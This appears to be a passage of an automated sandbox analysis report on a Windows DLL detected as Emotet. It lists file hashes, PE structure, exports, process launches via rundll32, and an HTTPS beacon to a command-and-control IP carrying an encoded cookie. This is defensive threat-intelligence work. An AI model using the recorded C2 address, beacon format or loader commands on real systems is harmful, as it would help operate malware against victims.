                          SSDEEP:192:Rrl7r3GLNi006c6YrJSUZCgmfL8GSZ+pDV89biusfb2m:RrlsNin6c6YFSUZCgmfLrSnitfz
                          MD5:45B484554E744A5B39F40F9CFA754EEF
                          SHA1:3C7130BDDC84A64FA209B52ADBA5346B264EE96D
                          SHA-256:BA597D1ECA4C78138A47D7797D5059815572533C30DCA96917BAD65B6CE03951
                          SHA-512:E5071F2DCC042469BC5A696EAE73246E2EA25CECA922B9ECE1A96158ABE0DC7090D38AFEEE3F9E4C1F5C4DDC77AE498C0C71BC7290E141A7D67BB6044ED8F762
                          Malicious:false
                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.8.<./.P.i.d.>.......
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5C7.tmp.xml
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4558
                          Entropy (8bit):4.431257039534109
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zs8JgtWI90CkgwSWSC8Bo8fm8M4J2yGtFg+q84tj1yKcQIcQwQyd:uITf6frgwzSN3JEox1yKkwQyd
                          MD5:8834F0F83F8A79BA6E8F5A04C815DC4C
                          SHA1:2E2BAC63DEBD1E64B97486EDA994F6F2183AB686
                          SHA-256:CC01D1EE6767DF3178982FC44C0322E038A2638E9071D90DE6C80D4F8F98F93B
                          SHA-512:E090841A1192FCA51DC9B7D10BB70DC066F1549FC58BD3046539F71BB7F40458D833AAFC0880D7435BBDEC86CCE0DA0DC8A2E5E893030FCA71778755F0AEA01E
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279265" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                          C:\Windows\appcompat\Programs\Amcache.hve
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1572864
                          Entropy (8bit):4.240892545103475
                          Encrypted:false
                          SSDEEP:12288:EjySJL1r13tcB96tQi9Ot58i3vV1IzQlZyCjP/pH+Mnns0HP:0ySJL1r13tS96tmt3
                          MD5:6645A32F023CD201C9B65B259632ED51
                          SHA1:CF405D0557BC2EBBD413607ADF5C8527F9D2F548
                          SHA-256:687E0E6DB616F1113BDF6BC49594216C2691AC85D9895A144032CCA4A08D222A
                          SHA-512:3CD598BB6161B080F596147EBFE356461BCE90B369987D2169B7324FE3520F846DC603CF462AE8E136843627B3FDFB3717543C682160F9B55F3A8886572508D1
                          Malicious:false
                          Preview: regfI...I...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmz3..................................................................................................................................................................................................................................................................................................................................................4'..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):3.7278103860465284
                          Encrypted:false
                          SSDEEP:384:nwK5K5Acv4KgnVVeeDze/1NKZtjnT8GRFwXnI:wUKLg/eeDze9NYtjAGRFwX
                          MD5:9C13EE322F620513A3DD4EFA4D7A2BE7
                          SHA1:AF610639D69985357C4555CFB746470BE176FE3C
                          SHA-256:9A13391967B3D52EB8080979E217AF6023059A5F6C5C0F8AE64F4CF22E0C77A8
                          SHA-512:3F55323E578C727284461EC0E0BA49AFCBBBB8DC29417D6AA9D4CE63C935A12C33FFDB5EC4A5D82CA385E56CBBAD99CD29205684DCF05A39CF53265E054EACD2
                          Malicious:false
                          Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmz3..................................................................................................................................................................................................................................................................................................................................................2'..HvLE.>......H...........F..Nt...-..Y.........................hbin................p.\..,..........nk,............x........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ............ ........................... .......Z.......................Root........lf......Root....nk ........................................ ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                          Static File Info

                          General

                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.067319727198819
                          TrID:
                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                          • Generic Win/DOS Executable (2004/3) 0.20%
                          • DOS Executable Generic (2002/1) 0.20%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:IGidwJjoUs.dll
                          File size:372736
                          MD5:daf0060326338fd3d153248ca89b40e5
                          SHA1:b11244a64678d1e8280b7daf273cb0563ee51803
                          SHA256:e9f7e82f30ad5350adb0ad37ac11bc26ae7f3b0879fe33e2a23c97f158c85780
                          SHA512:727ab782457d503480cb9e4991634be013effac466daa6431045bbda9f252f36c74b17ba5f94a4438781f950f3fe5e2076ae1b8cc39e273b3746842dc239d71a
                          SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJyj6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLORQKqV4epRmxAvAD
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                          File Icon

                          Icon Hash:74f0e4ecccdce0e4

                          Static PE Info

                          General

                          Entrypoint:0x1001a401
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x10000000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                          TLS Callbacks:0x1000c500
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:609402ef170a35cc0e660d7d95ac10ce

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          cmp dword ptr [ebp+0Ch], 01h
                          jne 00007FF3E4E03407h
                          call 00007FF3E4E03798h
                          push dword ptr [ebp+10h]
                          push dword ptr [ebp+0Ch]
                          push dword ptr [ebp+08h]
                          call 00007FF3E4E032B3h
                          add esp, 0Ch
                          pop ebp
                          retn 000Ch
                          push ebp
                          mov ebp, esp
                          push dword ptr [ebp+08h]
                          call 00007FF3E4E03CAEh
                          pop ecx
                          pop ebp
                          ret
                          push ebp
                          mov ebp, esp
                          jmp 00007FF3E4E0340Fh
                          push dword ptr [ebp+08h]
                          call 00007FF3E4E07794h
                          pop ecx
                          test eax, eax
                          je 00007FF3E4E03411h
                          push dword ptr [ebp+08h]
                          call 00007FF3E4E07810h
                          pop ecx
                          test eax, eax
                          je 00007FF3E4E033E8h
                          pop ebp
                          ret
                          cmp dword ptr [ebp+08h], FFFFFFFFh
                          je 00007FF3E4E03D73h
                          jmp 00007FF3E4E03D50h
                          push ebp
                          mov ebp, esp
                          push 00000000h
                          call dword ptr [1002808Ch]
                          push dword ptr [ebp+08h]
                          call dword ptr [10028088h]
                          push C0000409h
                          call dword ptr [10028040h]
                          push eax
                          call dword ptr [10028090h]
                          pop ebp
                          ret
                          push ebp
                          mov ebp, esp
                          sub esp, 00000324h
                          push 00000017h
                          call dword ptr [10028094h]
                          test eax, eax
                          je 00007FF3E4E03407h
                          push 00000002h
                          pop ecx
                          int 29h
                          mov dword ptr [1005AF18h], eax
                          mov dword ptr [1005AF14h], ecx
                          mov dword ptr [1005AF10h], edx
                          mov dword ptr [1005AF0Ch], ebx
                          mov dword ptr [1005AF08h], esi
                          mov dword ptr [1005AF04h], edi
                          mov word ptr [eax], es

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x583900x8ac.rdata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x58c3c0x3c.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1bb0.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x56fdc0x54.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x571000x18.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x570300x40.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x280000x154.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x264f40x26600False0.546620521173data6.29652715831IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0x280000x313fa0x31400False0.822468868972data7.43223852179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x5a0000x18440xe00False0.270647321429data2.60881097454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .pdata0x5c0000x66c0x800False0.3583984375data2.21689595795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .reloc0x5d0000x1bb00x1c00False0.784598214286data6.62358237634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Imports

                          DLLImport
                          KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                          USER32.dllGetDC, ReleaseDC, GetWindowRect

                          Exports

                          NameOrdinalAddress
                          Control_RunDLL10x100010a0
                          ajkaibu20x100016c0
                          akyncbgollmj30x10001480
                          alrcidxljxybdggs40x10001860
                          bgmotrriehds50x10001820
                          bojkfvynhhupnooyb60x100019f0
                          bujuoqldqlzaod70x10001800
                          bunsahctogxzts80x100019e0
                          cjogbtafwukesw90x10001830
                          csbbcaopuok100x100016a0
                          cyqrjpaeorjur110x100015f0
                          dlrzuyaeqj120x10001840
                          egiimrq130x10001850
                          evhgyts140x100014f0
                          fdqpjjjyuw150x100017e0
                          finabzjyxhxnnuuv160x10001510
                          fkeacqpbbfw170x10001910
                          fuwsgzf180x10001790
                          fzbmpailk190x10001980
                          gamsrhauvgl200x10001810
                          gjfqgtgk210x10001a10
                          gwsmfxfmekkyr220x100018b0
                          haymuvtatadeydqmk230x10001530
                          hqruohhkvpdalhq240x10001620
                          htdaydfvtjlujwcaj250x10001660
                          hzyrvjtx260x100017c0
                          ifnsupqhxkwj270x10001870
                          ijhgowlpmypocg280x10001720
                          ispjhrqaxnyflnn290x100015a0
                          iszvcqv300x100017a0
                          ixgucop310x100018d0
                          jcdvrhrguqtjpkc320x100016b0
                          jkfyadsdpoks330x100019c0
                          kfzgxmljkwaqy340x10001730
                          kzfvroxozxufciczm350x10001740
                          lpstjqa360x10001900
                          ltkoyvzovzkqemyw370x10001630
                          mdigcwjymnzvgaql380x100014d0
                          mefathlzguuhqodfx390x10001950
                          mgsrmfbja400x10001500
                          mrxhcceopg410x100014a0
                          nafhmuoq420x100018f0
                          nefxgpc430x100018a0
                          nrehxpiznrppeu440x10001690
                          nucocnvjyqp450x100018e0
                          obxoxtcbntaxofr460x10001890
                          ofrzojd470x100016e0
                          oofbctfc480x10001550
                          opzpazspbecyjojf490x100015b0
                          oqoigff500x10001a00
                          oujlzhzvhjh510x100016f0
                          ovpsanbypajv520x100015e0
                          pblpcaadqbdxyb530x10001680
                          ragwdgnyohftj540x100017d0
                          rfosmac550x10001710
                          rgymbuetvifqjqdlo560x10001930
                          rmoxbxbbgidnbds570x10001970
                          rxnkmfbycdcc580x10001560
                          sefltbc590x10001880
                          sgieprcsphl600x100019a0
                          shpcmnqzvyltgdt610x100016d0
                          slktbekupvmdbt620x100015c0
                          sormivnk630x10001570
                          tdblkstlyin640x10001600
                          tkllyrc650x10001650
                          tkwpnvfqnbpbdqe660x10001a20
                          tnhtgnjrabqakgeke670x10001700
                          tzpmcwwig680x10001520
                          uceklmggjof690x10001610
                          ukwdddyj700x10001640
                          uwnaptydgur710x10001940
                          vjusqoeo720x10001580
                          vnyufpq730x10001590
                          vsrwmkhzkrtlexxb740x100014e0
                          wermsdfzb750x10001770
                          wkhpfdjkypy760x100014c0
                          wksndtayhfm770x100015d0
                          wnjvxspilxpchq780x10001670
                          wuqwfssiddrcl790x10001570
                          wyyhtqptznbrknitg800x100017f0
                          wzkcijdvadq810x10001540
                          wzxlvxuyy820x100019b0
                          xhtxeilfgsghxik830x10001780
                          xvdijhconoukll840x100014b0
                          ybbwnezvxfafm850x10001750
                          yeylpreasnzamgac860x100019d0
                          ypkidshxgzkkehc870x100018c0
                          ypzvmpfbgai880x10001760
                          zbrzizodycg890x10001990
                          zdiuqcnzg900x10001920
                          zfkwwtxd910x10001490
                          zktykfwmaehxg920x10001600
                          zmkbqvofdhermov930x10001960
                          zvtqmkitgmzgo940x100017b0

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 2, 2021 00:55:59.113495111 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:55:59.113668919 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:55:59.113843918 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:55:59.149615049 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:55:59.149646044 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:55:59.490511894 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:55:59.490653038 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:55:59.780678988 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:55:59.780733109 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:55:59.781363010 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:55:59.783365965 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:55:59.787297010 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:55:59.828861952 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:56:00.323075056 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:56:00.323179960 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:56:00.323218107 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:56:00.323240042 CET4434979445.63.5.129192.168.2.4
                          Dec 2, 2021 00:56:00.323384047 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:56:00.327590942 CET49794443192.168.2.445.63.5.129
                          Dec 2, 2021 00:56:00.327616930 CET4434979445.63.5.129192.168.2.4

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Dec 2, 2021 00:52:25.606822968 CET8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)

                          HTTP Request Dependency Graph

                          • 45.63.5.129

                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.44979445.63.5.129443C:\Windows\SysWOW64\rundll32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-01 23:55:59 UTC0OUTGET /vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIh HTTP/1.1
                          Cookie: HR=hcy/hRyH9NLoEyk6a7Uz59hOb7mzlO/wmgmuw+U+8hB3e4M76BBMZiQXdzL+rOvzb1yL3LfyOSim45PynOuCpUIZnQ5cZmHqs7SQt9O7zwz4xkXcg6/oRkU7EE5sPE10xFi1y7VDx9Ov7ygmxpemyuKnLT/gv0JB9m9mcmPDhKiVbEhBpBiGTYaZoGTSg6tFd1fI6MMeVezZeVD7pkX8i8U0SqwAVpQnS4Y1xB1iegh6pXp4tFE7gJs9t6T5v6aI71n7DxNMxlhyB7kHYd2tzisWwB/rDwKlrXgJBvRGWdLzEoTJug==
                          Host: 45.63.5.129
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          2021-12-01 23:56:00 UTC0INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Wed, 01 Dec 2021 23:56:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          2021-12-01 23:56:00 UTC0INData Raw: 31 35 36 0d 0a a0 80 bb 4b f5 40 e4 a9 cf 59 94 6b 5e 26 3f 20 bc ea 2b df 82 7f f6 09 17 3f e7 3e 23 92 53 8f 59 f0 fb 67 d3 19 12 43 28 33 26 79 62 6c 3e 99 06 d4 29 1c 98 b7 94 44 1c 5a 48 8d cc da b2 a5 75 f8 0d dc 3a f0 17 a9 29 a2 1c c7 9a 12 4d bd dc e0 d2 7f 9a 83 8b c9 27 d5 29 39 e9 02 aa 65 c8 72 da a1 5b dd 13 af 58 28 61 21 00 70 b6 ec 02 1c a1 9b cc db 55 a4 30 d6 18 ac b0 35 d1 b2 d5 0a 58 19 2c 47 c7 a9 ca 0a de ee 9c 1b b1 a5 88 8b 30 66 b9 69 54 03 84 4b a9 b8 82 40 bd 9a 55 bb 17 c4 85 27 6b e6 82 f0 a8 d6 e4 21 13 84 c3 d7 73 c7 d8 89 48 e2 30 1a 18 9a f6 77 4d fd 4e 9c c2 bf b1 d4 86 cf 4f 07 e7 ff 76 cb e1 98 c0 ec 54 d5 70 06 06 ad 27 f7 b9 ca 4a 1c 72 cb 98 dc da a0 34 2e 19 40 de c0 61 3b 28 6a 2b ec f5 87 cc f6 3d ae 14 49 09 85
                          Data Ascii: 156K@Yk^&? +?>#SYgC(3&ybl>)DZHu:)M')9er[X(a!pU05X,G0fiTK@U'k!sH0wMNOvTp'Jr4.@a;(j+=I


                          Code Manipulations

                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: loaddll32.exe PID: 6888 Parent PID: 6092

                          General

                          Start time:00:52:06
                          Start date:02/12/2021
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll"
                          Imagebase:0xb40000
                          File size:893440 bytes
                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.958610660.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.958610660.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.958778791.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.989427479.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.989393299.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.989393299.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.940009942.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.956837036.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.956837036.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.939031365.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.956978658.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.938967752.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.938967752.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          Reputation:high

                          Analysis Process: cmd.exe PID: 6908 Parent PID: 6888

                          General

                          Start time:00:52:07
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: rundll32.exe PID: 6920 Parent PID: 6888

                          General

                          Start time:00:52:07
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000003.904116541.00000000006AB000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000003.904116541.00000000006AB000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.914845954.0000000000540000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.914845954.0000000000540000.00000040.00000010.sdmp, Author: Joe Security
                          Reputation:high

                          Analysis Process: rundll32.exe PID: 6932 Parent PID: 6908

                          General

                          Start time:00:52:07
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.913622906.00000000010CA000.00000004.00000020.sdmp, Author: Joe Security
                          Reputation:high

                          Analysis Process: rundll32.exe PID: 6988 Parent PID: 6888

                          General

                          Start time:00:52:11
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,ajkaibu
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.930427759.00000000009EA000.00000004.00000020.sdmp, Author: Joe Security
                          Reputation:high

                          Analysis Process: rundll32.exe PID: 7000 Parent PID: 6888

                          General

                          Start time:00:52:15
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,akyncbgollmj
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
